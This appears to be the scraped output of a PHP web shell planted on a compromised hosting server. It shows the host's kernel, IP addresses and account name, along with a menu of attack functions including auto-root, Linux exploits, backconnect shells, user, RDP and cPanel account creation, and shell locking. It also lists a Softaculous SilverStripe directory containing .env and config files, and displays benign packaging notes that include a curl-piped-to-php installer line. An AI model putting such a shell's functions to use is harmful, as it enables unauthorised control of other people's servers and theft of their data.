Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.137.159.134
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
stripe /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
545
B
-rw-r--r--
_.htaccess
1.2
KB
-rw-r--r--
__config.php
622
B
-rw-r--r--
_edit.php
4.96
KB
-rw-r--r--
_edit.xml
447
B
-rw-r--r--
_upgrade.php
3.09
KB
-rw-r--r--
_upgrade.xml
383
B
-rw-r--r--
clone.php
9.47
KB
-rw-r--r--
error-404.html
3.68
KB
-rw-r--r--
error-500.html
3.58
KB
-rw-r--r--
extend.php
7.09
KB
-rw-r--r--
fileindex.php
160
B
-rw-r--r--
import.php
3.95
KB
-rw-r--r--
info.xml
3.39
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
10.26
KB
-rw-r--r--
install.xml
3.16
KB
-rw-r--r--
md5
1.72
KB
-rw-r--r--
notes.txt
1.99
KB
-rw-r--r--
stripe.sql
47.46
KB
-rw-r--r--
stripe.zip
16.58
MB
-rw-r--r--
update_pass.php
2.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. We use __config.php to reset the theme to the previous one if the version is less than 3.0 2. PHP REQUIREMENT LINK: https://docs.silverstripe.org/en/5/getting_started/server_requirements/ and /vendor/composer/platform_check.php 3. We have disabled upgrade in 4.0.0 because it requires migration with composer. https://docs.silverstripe.org/en/4/upgrading/#manual Try to add from next version. 4. Download package through composer because vendor sometimes give large package through their website downloads. curl -sS https://getcomposer.org/installer | php php composer.phar create-project silverstripe/installer {{path to stripe}} {{version}} 5. Keep SS_ENVIRONMENT_TYPE="live" before running the installation command 6. Install with following command as "soft" user from CLI because script has removed it's UI installation since 4.5.0 version. vendor/bin/sake dev/build 7. Add SS_DEFAULT_ADMIN_USERNAME and SS_DEFAULT_ADMIN_PASSWORD while installing manually to define username and password. 8. We have disabled install on windows because symlink issue since 4.4.1 9. We have kept version 4.5.2 in info.xml, because version released was 4.5.2 but however inside admin panel it shows 4.5.1, because they have changed their versioning scheme and its mentioned in the link below. They have different module versions for framework , recipe and cms and in admin panel the version indicator used is of cms which has 4.5.1 version. Also we have used 'silverstripe/recipe-cms' version i.e 4.5.2 in composer.lock to import version as 4.5.2, instead of 'silverstripe/cms' which holds version 4.5.1. https://github.com/silverstripe/silverstripe-installer/issues/276 (Version 4.5.2) 10. If you face error on accessing silver stripe admin panel in manual installation, try deleting server's /tmp/silver**** directory multiple times. 11. Take SQL dump after point no 6, command is fully executed. [Not required now] 12. admin files in .graphql-generated and /public/_graphql are geenerated post uploading files, hence not moved in our package.
Close